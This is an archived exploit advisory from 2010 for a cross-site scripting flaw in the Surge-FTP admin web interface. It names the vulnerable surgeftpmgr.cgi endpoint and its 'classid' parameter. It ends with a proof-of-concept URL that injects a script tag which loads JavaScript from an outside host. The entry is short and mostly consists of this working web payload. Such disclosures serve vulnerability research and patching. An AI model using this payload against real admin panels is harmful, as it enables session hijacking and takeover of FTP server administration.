Surge-FTP Cross Site Scripting

2010-01-11T00:00:00
ID PACKETSTORM:84999
Type packetstorm
Reporter FB1H2S
Modified 2010-01-11T00:00:00

Description

                                        
                                            `# Exploit Title: Surge-FTP Admin Web interface XSS Vulnerability  
# Date: 2010-01-09  
# Author: FB1H2S  
# Software Link: #http://netwinsite.com/ftp/surgeftp/surgeftp_23a6_windows.exe  
# Version: [2.0]  
# Tested on: [wINDOWS]  
# CVE : [if exists]  
# Code : [exploit code]   
  
<------------------- FB1H2S ------------------- >  
#############################################################  
# SURGE FTP ADMIN WEB Module XSS #  
#############################################################  
# Author : FB1H2S  
# Home : whitec0de.com  
# Bug Type : Xss  
#  
#   
#############################################################  
=======================C=y=b=e=r=_=9=4=5================  
http://127.0.0.1:7021/cgi/surgeftpmgr.cgi?cmd=class&domainid=0&classid=[xss via src]  
  
  
  
http://127.0.0.1:7021/cgi/surgeftpmgr.cgi?cmd=class&domainid=0&classid=[xss]  
  
=======================FB1H2S===========================  
*****  
Poc *  
*****  
  
  
  
http://127.0.0.1:7021/cgi/surgeftpmgr.cgi?cmd=class&domainid=0&classid=%3CSCRIPT%20SRC=http://ha.ckers.org/xss.js%3E%3C/SCRIPT%3E  
`